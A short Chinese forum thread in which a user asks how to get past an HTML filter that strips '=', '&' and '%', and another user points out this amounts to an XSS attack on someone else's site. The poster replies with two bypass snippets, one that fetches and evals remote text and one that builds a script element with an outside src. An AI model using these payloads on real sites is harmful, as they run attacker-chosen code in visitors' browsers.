老哥们， html 标签过滤了=号&和%有没有可以直接写标签属性的方法？

@learningman

哈哈哈，可惜不是刷题木有答案，就是想找这个可以转换成=的字符，知识到了边界找不到了= =。

@cyrbuzz 网站不是你的，你还想让 XSS 对所有人生效，你这不是攻击是啥

@jin5354

这还是有点不一样吧，并没有过滤<>/，script ，要是想攻击我直接插一个外部 JS 就完事了，我还用得着绕个大圈讲武德的硬写 HTML?

考虑下传输虚拟 DOM 对象（ JSON ）。然后前端转义为 xml

@cyrbuzz 没有=号你也插入不了外部 js 啊

@wednesdayco

可以的，我想到的有两种：

1. fetch 一个外部字符串，然后 eval ，fetch('').then(function (val) { eval(val) })，字符串的内容就是正经插入就可以。

2. 设置了请求策略的话可以借用 window 对象，`Object.assign(window, { xss: [] })`，这样就得到了一个可以存放任意变量的`window.xss`对象，然后`window.xss.push(document.createElement('script')); window.xss[0].setAttribute('src', 'http://www.baidu.com'); document.body.appendChild(window.xss[0])`，就插入外部 js 了。

@lhstock

解析不受控，老哥能否具体说说怎么做？